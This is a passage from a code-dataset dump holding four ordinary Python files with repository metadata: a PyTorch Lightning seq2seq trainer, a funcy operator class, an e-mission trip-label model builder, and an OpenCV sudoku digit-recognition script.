"usage_type": "call"
},
{
"api_name": "scipy.optimize.linprog",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "ray.serve.deployment",... |
40761385267 | import os
import sys
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
# PROJ_DIR = FILE_DIR[:FILE_DIR.index('src')]
# sys.path.append(PROJ_DIR)
PROJ_DIR = os.path.abspath("..")
print(f"proj_dir is: {PROJ_DIR}, adding to sys.path")
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger
from torchmetrics.functional import bleu_score
from transformers import get_linear_schedule_with_warmup
from q_snippets.data import load_json, save_json
from data_utils import Seq2seqDataModule
from model import get_model_by_name
class Seq2seqGeneration(pl.LightningModule):
    """LightningModule wrapping a HuggingFace seq2seq model for conditional
    generation.

    Validation predictions/targets are accumulated across steps to compute
    corpus BLEU and dump per-epoch prediction files to the log directory.
    """
    def __init__(self, config, model) :
        super().__init__()
        self.config = config
        self.model = model
        self.save_hyperparameters(ignore='model') # ignore model to avoid assigning model to Omegaconf when load_from_ckpt
        # Accumulators, reset at the end of every validation epoch.
        self.val_pred_ids = []
        self.val_target_ids = []
        self.gold_corpus = []
        self.pred_corpus = []

    def forward(self, batch):
        """Teacher-forced forward pass; returns the HF model output (with loss)."""
        def _custom_forward(batch):
            """ for BART: shift targets manually and mask pad tokens to -100 """
            if batch.target_ids is not None:
                target_ids = batch.target_ids[:, :-1].contiguous()
                lm_labels = batch.target_ids[:, 1:].clone()
                lm_labels[batch.target_ids[:, 1:] == self.model.config.pad_token_id] = -100
            else:
                target_ids, lm_labels = None, None
            # print(batch.input_ids.size(), target_ids.size(), lm_labels.size())
            output = self.model(
                input_ids=batch.input_ids, attention_mask=batch.attention_mask,
                decoder_input_ids=target_ids,
                labels=lm_labels,
                # output_attentions=True # for copy mechanism
            )
            return output
        def _default_forward(batch):
            """For T5: during training the model derives decoder_input_ids
            automatically by right-shifting `labels`."""
            return self.model(batch.input_ids, attention_mask=batch.attention_mask, labels=batch.target_ids)
        return _default_forward(batch)
        # return _custom_forward(batch)

    def training_step(self, batch, batch_idx):
        output = self(batch)
        self.log('train_loss', output.loss, prog_bar=True, sync_dist=True)
        return output.loss

    def validation_step(self, batch, batch_idx) :
        """Log val loss and greedily generate predictions for BLEU."""
        output = self(batch)
        # self.val_pred_ids.extend(output.logits.argmax(-1).cpu().numpy().tolist())
        self.log('val_loss', output.loss, prog_bar=True, sync_dist=True) #log the val_loss
        pred_ids = self.model.generate(
            input_ids=batch.input_ids, max_length=500, use_cache=True,
            num_beams=1, do_sample=False # greedy search is the fastest
        )
        self.val_pred_ids.extend(pred_ids)
        # save gold ids for bleu computing (only until gold_corpus is cached)
        if self.gold_corpus == [] and batch.target_ids is not None:
            self.val_target_ids.extend(batch.target_ids.cpu().numpy().tolist())

    def _save_val_result(self):
        """Dump (sample, expected, generated) triples to val_epochXX.json
        in the logger's directory."""
        self.gold_corpus = ["None" for _ in self.pred_corpus ] if self.gold_corpus == [] else self.gold_corpus
        R = []
        for p, sample, g in zip(self.pred_corpus, self.trainer.datamodule.valset.samples, self.gold_corpus):
            R.append(dict(
                **sample.__dict__,
                **{
                    'expected': g,
                    'generated':p}
            ))
        # logdir = trainer.logger.log_dir if hasattr(trainer.logger, 'log_dir') else trainer.logger.save_dir
        logdir = self.trainer.logger.log_dir
        filename = os.path.join(logdir, f"val_epoch{self.current_epoch:02}.json")
        save_json(R, filename)

    def validation_epoch_end(self, outputs):
        """Decode accumulated ids, compute corpus BLEU, persist predictions."""
        tokenizer = self.trainer.datamodule.tokenizer
        self.pred_corpus = tokenizer.batch_decode(self.val_pred_ids, skip_special_tokens = True, clean_up_tokenization_spaces = True)
        # The gold corpus is decoded only once and reused in later epochs.
        if self.gold_corpus == [] and self.val_target_ids != [] :
            self.gold_corpus = tokenizer.batch_decode(self.val_target_ids, skip_special_tokens = True, clean_up_tokenization_spaces = True)
        print(len(self.pred_corpus), len(self.gold_corpus))
        bleu = bleu_score(self.pred_corpus, [ [_] for _ in self.gold_corpus])
        self.log('val_bleu', bleu, prog_bar=True, sync_dist=True)
        self._save_val_result()
        self.val_pred_ids, self.val_target_ids =[], []

    def _get_grouped_params(self):
        """Split model parameters into weight-decay / no-weight-decay groups."""
        no_decay = ["bias", "LayerNorm.weight"]
        # Group parameters to those that will and will not have weight decay applied
        optimizer_grouped_parameters = [
            {
                "params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)],
                "weight_decay": 0.01,
            },
            {
                "params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)],
                "weight_decay": 0.0,
            },
        ]
        return optimizer_grouped_parameters

    def configure_optimizers(self):
        """AdamW with a linear warmup schedule stepped every optimizer step."""
        optimizer = optim.AdamW(self._get_grouped_params(), lr=self.config.lr)
        # return optimizer
        total_steps = int(len(self.trainer.datamodule.train_dataloader()) // self.config.accumulate_grads ) * self.config.max_epochs # accumulate_grads
        warmup_step = int(total_steps * self.config.warmup_rate)
        # lr_scheduler = get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_step, num_training_steps=steps_per_epoch*self.config.max_epochs)
        lr_scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_step, num_training_steps=total_steps)
        return [optimizer], [{'scheduler': lr_scheduler, 'interval': 'step', 'frequency': 1, 'strict': True, 'monitor': None}]

    def predict_step(self, batch , batch_idx) :
        """Generate for one predict batch; returns plain python id lists."""
        batch_pred_ids = self.model.generate(
            input_ids=batch.input_ids, max_length=500, use_cache=True)
        return batch_pred_ids.cpu().numpy().tolist()

    def on_predict_epoch_end(self, results) -> None:
        """Aggregate every predict_step's output, decode it and save the
        predictions to ``config.preds.result_path``.

        results = [[ batch_result ]], batch_result = [[],[],...]
        """
        all_pred_ids = sum(results[0], [])
        preds = self.trainer.datamodule.tokenizer.batch_decode(all_pred_ids, skip_special_tokens = True, clean_up_tokenization_spaces = True)
        R = []
        for sample, p in zip(self.trainer.datamodule.testset.samples, preds):
            R.append(dict(
                **sample.__dict__,
                **{
                    'generated':p}
            ))
        save_json(R, self.config.preds.result_path)
        return preds
def train_model(config):
    """Build the model + datamodule and run the full training loop."""
    _model = get_model_by_name(config)
    model = Seq2seqGeneration(config, _model) # wrap the raw HF model in the Lightning module
    dm = Seq2seqDataModule(config=config)
    logger = TensorBoardLogger(
        save_dir="./lightning_logs/",
        name=None, # experiment name: ./lightning_logs/exp_name/version_name
        version=config.version, # version name: ./lightning_logs/version_name
    )
    # Checkpoint directory and naming scheme.
    CUR_DIR = os.getcwd()
    dirname = os.path.join(CUR_DIR, "./lightning_logs/", config.version)
    ckpt_callback = ModelCheckpoint(
        dirpath=dirname,
        filename="{epoch}_{train_loss:.4f}_{val_bleu:.4f}", # checkpoint name carries epoch and validation score
        monitor='val_bleu',
        mode='max',
        save_top_k=3,
        verbose=True,
    )
    es = EarlyStopping('train_loss', patience=10, mode='min')
    trainer = pl.Trainer(
        accumulate_grad_batches=config.accumulate_grads,
        logger=logger,
        num_sanity_val_steps=0, # a sanity check would corrupt the gold_corpus bookkeeping during validation
        # limit_train_batches=64, # cap training batches for quick debugging
        # limit_val_batches=64, # generally use the full validation set; capping may break the val hooks
        max_epochs=config.max_epochs,
        callbacks=[ckpt_callback, es],
        accelerator="gpu",
        devices=1,
        # resume_from_checkpoint="/home/qing/repos/demo/conditional_generation/lightning_logs/2rd/epoch=1_train_loss=2.0390_val_bleu=0.0197.ckpt"
    )
    # dm.setup(stage='fit')
    trainer.fit(model, dm)
def predict_ckpt(config):
    """Load a checkpoint and run Trainer.predict over the test set."""
    dm = Seq2seqDataModule(config)
    dm.setup(stage='test')
    _model = get_model_by_name(config)
    model = Seq2seqGeneration.load_from_checkpoint(config.preds.ckpt_path, config=config, model=_model)
    trainer = pl.Trainer(accelerator="gpu", devices=1)
    x = trainer.predict(model, dm) # predictions were already saved in on_predict_epoch_end
    print(type(x))
def raw_generate(config):
    """Generate over the test set with a plain loop (no Lightning Trainer)."""
    from tqdm import tqdm
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    dm = Seq2seqDataModule(config)
    dm.setup(stage='test')
    _model = get_model_by_name(config)
    model = Seq2seqGeneration.load_from_checkpoint(config.preds.ckpt_path, config=config, model=_model).to(device)
    with torch.no_grad():
        R = []
        for i, batch in enumerate(tqdm(dm.test_dataloader())):
            batch = batch.to(device)
            # Greedy decoding, same settings as validation_step.
            pred_ids = model.model.generate(input_ids=batch.input_ids, max_length=500, use_cache=True, num_beams=1, do_sample=False)
            R.extend(pred_ids.cpu().numpy().tolist())
    # NOTE(review): the decoded output is neither returned nor saved —
    # confirm whether this function was truncated or intentionally ends here.
    x = dm.tokenizer.batch_decode(R)
| Qing25/demo | conditional_generation/frame.py | frame.py | py | 9,872 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line... |
5460426589 | from functools import partial
from ._derived import Derived
from . import utilities
class Operation(Derived):
    """A Derived node whose value is an operator applied to resolved sub-terms."""

    __slots__ = ('opkwargs', 'opfn')

    def __init__(self,
            *terms,
            op = None,
            **kwargs,
            ):
        # A tuple `op` denotes a chain: every op but the last is applied
        # first by wrapping `terms` in nested Operation nodes.
        if type(op) is tuple:
            sops, op = op[:-1], op[-1]
            for sop in sops:
                terms = Operation(*terms, op = sop)
        # After chaining, `terms` can be a single Operation; re-wrap as a tuple.
        if not type(terms) is tuple:
            terms = terms,
        # Bind the fixed keyword arguments into the operator once, up front.
        self.opfn = partial(op, **kwargs)
        self.opfn.__name__ = op.__name__
        self.opkwargs = kwargs
        super().__init__(*terms, op = op, **kwargs)

    def evaluate(self):
        # Resolve the sub-terms (Derived machinery) and apply the operator.
        return self.opfn(*self._resolve_terms())

    def _titlestr(self):
        # Display name: the wrapped operator's name.
        return self.opfn.__name__

    def _kwargstr(self):
        # Stringify the kwargs minus the operator itself.
        # NOTE(review): self.kwargs is presumably populated by Derived.__init__
        # from the **kwargs passed to super() — confirm in _derived.py.
        kwargs = self.kwargs.copy()
        del kwargs['op']
        if kwargs:
            return utilities.kwargstr(**kwargs)
        else:
            return ''
| lmoresi/funcy | funcy/_operation.py | _operation.py | py | 972 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "_derived.Derived",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "functools.partial",
"line_number": 20,
"usage_type": "call"
}
] |
15826790722 | # Standard imports
import copy
import pandas as pd
import logging
import jsonpickle as jpickle
import sklearn.cluster as sc
# Our imports
import emission.storage.timeseries.abstract_timeseries as esta
import emission.analysis.modelling.tour_model.get_scores as gs
import emission.analysis.modelling.tour_model.get_users as gu
import emission.analysis.modelling.tour_model.label_processing as lp
import emission.analysis.modelling.tour_model.evaluation_pipeline as ep
import emission.analysis.modelling.tour_model.load_predict as load
import emission.analysis.modelling.tour_model.data_preprocessing as preprocess
def find_best_split_and_parameters(user, test_data):
    """Pick the data split with the highest score for *user*.

    Reads ``user_<user>.csv`` (indexed by the ``split`` column) from the
    current directory, locates the first row holding the maximum
    ``scores`` value, and returns the matching entry of *test_data*
    together with the tuning parameters stored in that row.

    :param user: user identifier used to build the csv file name
    :param test_data: per-split test subsets, positionally aligned with the csv rows
    :return: (best_split, best_split_idx, lower_boundary, distance_pct)

    NOTE(review): ``best_split_idx`` is a *positional* index into the
    score list but is then used as a *label* with ``df.loc`` — the two
    only agree when the ``split`` index is 0..n-1; confirm upstream.
    """
    score_table = pd.read_csv(f"user_{user}.csv", index_col='split')
    score_list = list(score_table['scores'])
    winner = score_list.index(max(score_list))
    # position of the best score selects the split ...
    chosen_split = test_data[winner]
    # ... and the row holding the tuned parameters
    lower_bound = score_table.loc[winner, 'lower boundary']
    distance_pct = score_table.loc[winner, 'distance percentage']
    return chosen_split, winner, lower_bound, distance_pct
# def find_best_parameters(user,best_split_idx):
# tradeoff_filename = 'tradeoff_' + str(user)
# tradeoff_1user = load.loadModelStage(tradeoff_filename)
# best_parameters = tradeoff_1user[best_split_idx]
# return best_parameters
def save_models(obj_name, obj, user):
    """Serialize *obj* with jsonpickle and write it to ``<obj_name>_<user>``.

    The capsule is plain JSON text, so the file is opened in text mode.
    """
    serialized = jpickle.dumps(obj)
    target = obj_name + '_' + str(user)
    with open(target, "w") as out_file:
        out_file.write(serialized)
def main():
    """Build and persist per-user label-prediction models.

    For every user in the timeseries database: filter their labeled
    trips, run two rounds of clustering with the best split/parameters
    found by tuning, then save via save_models():
      * 'user_labels'  — label probability tables per cluster,
      * 'models'       — the fitted second-round KMeans models,
      * 'locations'    — location features of each first-round bin.
    """
    all_users = esta.TimeSeries.get_uuid_list()
    radius = 100
    for a in range(len(all_users)):
        user = all_users[a]
        trips = preprocess.read_data(user)
        filter_trips = preprocess.filter_data(trips, radius)
        # filter out users that don't have enough valid labeled trips
        if not gu.valid_user(filter_trips, trips):
            logging.debug("This user doesn't have enough valid trips for further analysis.")
            continue
        tune_idx, test_idx = preprocess.split_data(filter_trips)
        # NOTE(review): test_data is built from tune_idx, not test_idx —
        # confirm this is intentional.
        test_data = preprocess.get_subdata(filter_trips, tune_idx)
        # find the best split and parameters, and use them to build the model
        best_split, best_split_idx, low, dist_pct = find_best_split_and_parameters(user, test_data)
        # run the first round of clustering
        sim, bins, bin_trips, filter_trips = ep.first_round(best_split, radius)
        # It is possible that the user doesn't have common trips; only build
        # models for users who do.  (Was `is not 0`: identity comparison with
        # an int literal is unreliable — use a value comparison.)
        if len(bins) != 0:
            gs.compare_trip_orders(bins, bin_trips, filter_trips)
            first_labels = ep.get_first_label(bins)
            first_label_set = list(set(first_labels))
            # second round of clustering
            model_coll = {}
            bin_loc_feat = {}
            first_round_labels = {}
            for fl in first_label_set:
                # store second round trips data
                second_round_trips = []
                for index, first_label in enumerate(first_labels):
                    if first_label == fl:
                        second_round_trips.append(bin_trips[index])
                x = preprocess.extract_features(second_round_trips)
                # collect location features of the bin from the first round of
                # clustering; feat[0:4] are start/end coordinates
                bin_loc_feat[str(fl)] = [feat[0:4] for feat in x]
                # pass features(x) from the selected second-round trips to build the model
                method = 'single'
                clusters = lp.get_second_labels(x, method, low, dist_pct)
                n_clusters = len(set(clusters))
                # build the model
                kmeans = sc.KMeans(n_clusters=n_clusters, random_state=0).fit(x)
                # collect all models, keyed by the label from the 1st round
                # e.g. {'0': KMeans(n_clusters=2, random_state=0)}
                model_coll[str(fl)] = kmeans
                # get labels from the 2nd round of clustering
                second_labels = kmeans.labels_
                first_label_obj = []
                # save user labels for every cluster
                second_label_set = list(set(second_labels))
                sec_round_labels = {}
                for sl in second_label_set:
                    sec_sel_trips = []
                    sec_label_obj = []
                    for idx, second_label in enumerate(second_labels):
                        if second_label == sl:
                            sec_sel_trips.append(second_round_trips[idx])
                    user_label_df = pd.DataFrame([trip['data']['user_input'] for trip in sec_sel_trips])
                    user_label_df = lp.map_labels(user_label_df)
                    # compute the sum of trips in this cluster
                    sum_trips = len(user_label_df)
                    # compute unique label sets and their probabilities ('p') in one cluster
                    unique_labels = user_label_df.groupby(user_label_df.columns.tolist()).size().reset_index(name='uniqcount')
                    unique_labels['p'] = unique_labels.uniqcount / sum_trips
                    labels_columns = user_label_df.columns.to_list()
                    for i in range(len(unique_labels)):
                        one_set_labels = {}
                        # e.g. labels_only = {'mode_confirm': 'pilot_ebike',
                        # 'purpose_confirm': 'work', 'replaced_mode': 'walk'}
                        labels_only = {column: unique_labels.iloc[i][column] for column in labels_columns}
                        one_set_labels["labels"] = labels_only
                        one_set_labels['p'] = unique_labels.iloc[i]['p']
                        # in case append() method changes the dict, we use deepcopy here
                        labels_set = copy.deepcopy(one_set_labels)
                        sec_label_obj.append(labels_set)
                    # user labels from the 2nd round, keyed by the 2nd-round cluster label
                    sec_round_labels[str(sl)] = sec_label_obj
                sec_round_collect = copy.deepcopy(sec_round_labels)
                # collect all user labels from the 2nd round, keyed by the 1st-round label
                first_label_obj.append(sec_round_collect)
                first_round_labels[str(fl)] = first_label_obj
            # wrap up all labels
            all_labels = [first_round_labels]
            # save all user labels
            save_models('user_labels', all_labels, user)
            # save models from the 2nd round of clustering
            save_models('models', [model_coll], user)
            # save location features of all bins
            save_models('locations', [bin_loc_feat], user)
if __name__ == '__main__':
    # Timestamped debug logging for the whole model-building run.
    logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s',
                        level=logging.DEBUG)
    main()
| e-mission/e-mission-server | emission/analysis/modelling/tour_model/build_save_model.py | build_save_model.py | py | 7,787 | python | en | code | 22 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "jsonpickle.dumps",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "emission.storage.timeseries.abstract_timeseries.TimeSeries.get_uuid_list",
"line_number": 48,
"usage_typ... |
15207404869 | # 最短距离算法
import networkx as nx
debug = False
start_node = ('start', -1) # 初始节点
end_node = ('end', -1) # 终止节点
def fmt_edges(points, max_score=1.):
    """Format a list of node scores into weighted graph edges.

    Each score becomes a distance ``max_score - score`` so that the
    shortest path corresponds to the best total score.  For every left
    index a virtual node (right == -1) with full cost ``max_score`` is
    added, which lets the path skip that position.

    :param points: list of [left, right, score]
    :param max_score: cost assigned to the virtual "skip" node
    :return edges: [(node_id1, node_id2, distance)]
    :return nodes: [(left, right)] in node-id order, including the
        virtual start and end nodes
    """
    points_dict = dict()
    for i, j, score in points:
        # default entry is the virtual (skip) node
        points_dict.setdefault(i, [(-1, max_score)]).append((j, max_score - score))
    edges, last_nodes = [], [start_node]
    nodes = [start_node]
    for left, points_score in points_dict.items():
        curr_nodes = []
        for right, score in points_score:
            node = (left, right)
            curr_nodes.append(node)
            edges += init_edges(last_nodes, node, score)
        nodes += curr_nodes
        last_nodes = curr_nodes
    # terminal node
    nodes.append(end_node)
    if debug:
        print('edges:', [edge[:2] for edge in edges if edge[0] != start_node])
    edges += init_edges(last_nodes, end_node, 0.)
    # remap (left, right) node tuples onto integer ids for networkx
    node_keys = {val: key for key, val in enumerate(nodes)}
    edges = [(node_keys[f_node], node_keys[t_node], score) for f_node, t_node, score in edges]
    return edges, nodes
def init_edges(last_nodes, point, score):
    """Connect every node in *last_nodes* to *point* with weight *score*.

    An edge is skipped when both endpoints are real matches (right index
    >= 0) and the ordering constraint ``last.right < point.right`` would
    be violated; virtual nodes (right == -1) always connect.
    """
    def allowed(prev):
        return not (prev[1] >= 0 and point[1] >= 0 and prev[1] >= point[1])

    return [(prev, point, score) for prev in last_nodes if allowed(prev)]
def shortest_distance(edges, nodes, target=None, source=0):
    """Run Dijkstra over the weighted edges and return the matched path.

    :param edges: [(from_id, to_id, weight)]
    :param nodes: node list mapping integer ids back to (left, right) tuples
    :param target: target node id (defaults to the last node, i.e. the end node)
    :param source: source node id (defaults to 0, i.e. the start node)
    :return path: list[(left, right)] with the virtual start/end removed
    """
    if target is None:
        target = len(nodes) - 1
    G = nx.DiGraph()
    G.add_weighted_edges_from(edges)
    path = nx.dijkstra_path(G, source=source, target=target)
    if debug:
        print('shortest path: ', path)
    # drop the virtual start/end ids, then map ids back to (left, right)
    path = [p for p in path if p not in set((source, target))]
    path = [nodes[p] for p in path]
    return path
if __name__ == '__main__':
    # Manual smoke tests: print the chosen matching for a few score lists.
    debug = True

    def test(points):
        # Build the graph from the scores and print the shortest path.
        edges, nodes = fmt_edges(points)
        path = shortest_distance(edges, nodes)
        print(path)
        print("-------")

    points = [[0, 0, 0.5]]
    test(points)
    points = [[0, 0, 0.7], [0, 1, 0.1], [1, 0, 0.2], [1, 1, 0.6]]
    test(points)
    points = [[0, 0, 0.7], [0, 1, 0.1], [1, 0, 0.8], [1, 1, 0.6]]
    test(points)
    points = [[0, 0, 0.7], [1, 0, 0.1], [1, 1, 0.2], [2, 1, 0.8]]
    test(points)
| ibbd-dev/python-ibbd-algo | ibbd_algo/shortest_distance.py | shortest_distance.py | py | 2,510 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "networkx.DiGraph",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "networkx.dijkstra_path",
"line_number": 63,
"usage_type": "call"
}
] |
19022803935 | from aiogram.types import (
InlineKeyboardMarkup,
InlineKeyboardButton,
ReplyKeyboardMarkup,
KeyboardButton,
)
from main import admins_id
from utils.db_api.schemas.table_db import session, Contest
# Main reply keyboard: "add contest" and "cancel" actions.
kb = ReplyKeyboardMarkup(resize_keyboard=True)
kb.add(KeyboardButton("Добавить конкурс")).add(KeyboardButton("Отмена"))

# Authorization keyboard: requests the user's phone contact.
kb_auth = ReplyKeyboardMarkup(resize_keyboard=True)
kb_auth.add(KeyboardButton("Авторизация по телефону", request_contact=True))
def genmarkup(data: list) -> InlineKeyboardMarkup:
    """Build a one-column inline keyboard with one button per contest.

    Each entry of *data* is a row whose first element is the contest
    name; the button's callback data is ``con_<name>``.
    """
    keyboard = InlineKeyboardMarkup()
    keyboard.row_width = 1
    for row in data:
        contest_name = row[0]
        keyboard.add(InlineKeyboardButton(contest_name, callback_data=f"con_{contest_name}"))
    return keyboard
def to_pay(user_id: int, contest: str, skip: bool = False):
    """Build the inline keyboard shown under a contest card.

    For a contest with no winner yet: admins get a "choose winner /
    finish contest" button, other users get a "pay" button unless *skip*
    is set.  When the contest already has a winner the markup is empty.

    NOTE(review): ``admins_id`` appears to be an iterable of string ids
    (``str(user_id) in admins_id``) — confirm against main.py.
    """
    markup = InlineKeyboardMarkup()
    markup.row_width = 1
    contest_query = session.query(Contest).filter(Contest.name == contest).first()
    if not (contest_query.winner):
        if str(user_id) in admins_id:
            markup.add(
                InlineKeyboardButton(
                    "Выбрать победителя и закончить конкурс",
                    callback_data=f"win_{contest}",
                )
            )
        else:
            if not skip:
                markup.add(
                    InlineKeyboardButton(
                        "Внести плату",
                        callback_data=f"pay_{contest}"
                    )
                )
    return markup
| A-Sergey/TelegramBot_Contest | keyboards/buttons.py | buttons.py | py | 1,574 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "aiogram.types.ReplyKeyboardMarkup",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "aiogram.types.KeyboardButton",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "aiogram.types.ReplyKeyboardMarkup",
"line_number": 14,
"usage_type": "call... |
3680795220 | import numpy as np
import cv2
import math
import subprocess
import shutil
import os
if not os.path.exists('/home/martin/fotos'):
os.makedirs('/home/martin/fotos')
image_sudoku_original = cv2.imread('/home/martin/sudoku/sudoku_recognition/testing3.jpeg')
cv2.imshow("Imagen original",image_sudoku_original)
cv2.waitKey(0)
img = cv2.GaussianBlur(image_sudoku_original,(5,5),0)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
cv2.imshow("Imagen en escala de grises",gray)
cv2.waitKey(0)
thresh1 = cv2.adaptiveThreshold(gray,255,0,1,19,2)
cv2.imshow("Imagen binarizada",thresh1)
cv2.waitKey(0)
contours, hierarchy = cv2.findContours(thresh1, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#image_sudoku_candidates = image_sudoku_original.copy()
size_rectangle_max = 0;
biggest = None
max_area = 0
for i in contours:
area = cv2.contourArea(i)
if area > 100:
peri = cv2.arcLength(i, True)
approximation = cv2.approxPolyDP(i, 0.02 * peri, True)
if area > max_area and len(approximation) == 4:
biggest = approximation
max_area = area
for i in range(len(approximation)):
cv2.line(image_sudoku_original,
(biggest[(i % 4)][0][0], biggest[(i % 4)][0][1]),
(biggest[((i + 1) % 4)][0][0], biggest[((i + 1) % 4)][0][1]),
(255, 0, 0), 2)
cv2.imshow("Contorno principal",image_sudoku_original)
cv2.waitKey(0)
def rectify(h):
    """Order four corner points as [top-left, top-right, bottom-right, bottom-left].

    Uses the classic trick: the top-left corner minimises x+y and the
    bottom-right maximises it, while y-x is smallest at the top-right
    and largest at the bottom-left.
    """
    corners = h.reshape((4, 2))
    ordered = np.zeros((4, 2), dtype=np.float32)
    coord_sum = corners.sum(1)
    ordered[0] = corners[np.argmin(coord_sum)]
    ordered[2] = corners[np.argmax(coord_sum)]
    coord_diff = np.diff(corners, axis=1)
    ordered[1] = corners[np.argmin(coord_diff)]
    ordered[3] = corners[np.argmax(coord_diff)]
    return ordered
approx = rectify(biggest)
h = np.array([[0, 0], [449, 0], [449, 449], [0, 449]], np.float32)
retval = cv2.getPerspectiveTransform(approx, h)
warp_gray = cv2.warpPerspective(gray, retval, (450, 450))
h, w = warp_gray.shape[:2]
cv2.imshow("Imagen con cambio perspectiva",warp_gray)
cv2.waitKey(0)
var2 = cv2.adaptiveThreshold(warp_gray,255,0,1,19,2)
#close = cv2.morphologyEx(var2,cv2.MORPH_CLOSE,kernel1)
gauss = cv2.GaussianBlur(warp_gray, (5, 5), 0)
thresh = cv2.adaptiveThreshold(gauss,255,0,1,19,2)
kernel = np.ones((5, 5), np.uint8)
erosion = cv2.erode(thresh, kernel, iterations=1)
dilation = cv2.dilate(thresh, kernel, iterations=1)
closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)
#opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel)
#
# close = cv2.morphologyEx(thresh,cv2.MORPH_CLOSE,kernel1)
# div = np.float32(warp_gray)/(close)
# res = np.uint8(cv2.normalize(div,div,0,255,cv2.NORM_MINMAX))
# res2 = cv2.cvtColor(res,cv2.COLOR_GRAY2BGR)
#img = cv2.GaussianBlur(var2,(5,5),0)
cv2.imshow("Imagen con Closing",closing)
cv2.waitKey(0)
# cv2.imshow("Imagen ultimo",thresh)
# cv2.waitKey(0)
contours, hierarchy = cv2.findContours(closing, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
def nroCuadrado(x, y, w, h):
    """Map a bounding box to its (column, row) cell in the 9x9 sudoku grid.

    The 449x449 warped board is divided into 9 equal cells per axis; the
    box centre decides the cell.  Falls through (returns None) when the
    centre lies outside [0, 449] on either axis.
    """
    board_size = 449
    cell_w = board_size / 9
    cell_h = board_size / 9
    center_x = x + (w / 2)
    center_y = y + (h / 2)
    for col in range(9):
        for row in range(9):
            if (cell_w * col <= center_x <= cell_w * (col + 1)
                    and cell_h * row <= center_y <= cell_h * (row + 1)):
                return col, row
# --- Locate cell-sized quadrilaterals on the warped board and OCR each digit ---
sudoku_matrix = np.zeros((9,9))
squares = []
size_rectangle_max = 0;
biggest = None
max_area = 0
count = 0
area_total = 0
for i in contours:
    area = cv2.contourArea(i)
    if area > 100:
        # NOTE(review): `peri` here is stale — it still holds the arc length
        # of the last contour from the *previous* loop (board detection) and
        # is never recomputed for `i`; likely should be cv2.arcLength(i, True).
        approximation = cv2.approxPolyDP(i, 0.04 * peri, True)
        if len(approximation) == 4:
            area = cv2.contourArea(approximation)
            # keep only quadrilaterals whose area matches a single cell
            if area > 1000 and area <=3000:
                squares.append(approximation)
                area = cv2.contourArea(approximation)
                area_total += area
                count +=1
                x, y, w, h = cv2.boundingRect(approximation)
                #print("X: "+str(x)+" Y: "+str(y)+" W: "+str(w)+ " H: "+str(h))
                cv2.rectangle(gauss, (y, x), (y + w, x + h), (0, 255, 0), 2)
                # crop the digit with a 7px margin on every side
                new_image = gauss[x+7:x+h-7, y+7:y+w-7]
                f, g = nroCuadrado(x, y,w,h)
                var2 = cv2.adaptiveThreshold(new_image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \
                    cv2.THRESH_BINARY, 11, 2)
                name = '/home/martin/fotos/var%s%d.jpg' % (f, g)
                cv2.imwrite(name, var2)
                # mostly-white cells (>90% non-black pixels) are treated as empty
                non_black = cv2.countNonZero(var2)
                total = var2.size
                percent = (float(non_black)/float(total))*100
                if percent > 90.0:
                    number = -1
                else:
                    #number = predict.main(var2)
                    # run the digit classifier as a subprocess on the saved crop
                    command = name
                    number = subprocess.check_output(['python', 'predict.py', command])
                    #var = 1
                sudoku_matrix[f][g] = number
                #print(number)
                #cv2.imshow("Imagen perspectiva", var2)
                #cv2.waitKey(0)
                #name = '/home/lcorniglione/Documents/sudoku_recognition/fotos/var%s%d.jpg' %(f,g)
# average side length of a detected cell, used to grid-slice missed cells below
result = (area_total/count)
area_prom = math.sqrt(result)
print ("CANTIDAD RECONOCIDA:")
print (len(squares))
cant_squares = len(squares)
for i in range(0,9):
for j in range(0,9):
num = sudoku_matrix[i][j]
if num==(-1.0):
sudoku_matrix[i][j] = 0
if num==(0.0) and cant_squares<81:
im_number = gauss[i * (area_prom + 8):(i+1) * (area_prom + 8)][:,
j * (area_prom + 8):(j+1) * (area_prom + 8)]
var2 = cv2.adaptiveThreshold(im_number, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \
cv2.THRESH_BINARY, 11, 2)
non_black = cv2.countNonZero(var2)
total = var2.size
percent = (float(non_black) / float(total)) * 100
name = '/home/martin/fotos/var%s%d.jpg' % (i, j)
cv2.imwrite(name, var2)
if percent > 85.0:
number = -1
else:
command = name
number = subprocess.check_output(['python', 'predict.py', command])
sudoku_matrix[i][j] = number
print ("FINALIZADO")
print (sudoku_matrix)
cv2.imshow("Imagen cuadrados", gauss)
cv2.waitKey(0)
shutil.rmtree('/home/martin/fotos')
| msampietro/sudoku_recognition | sudoku.py | sudoku.py | py | 6,869 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
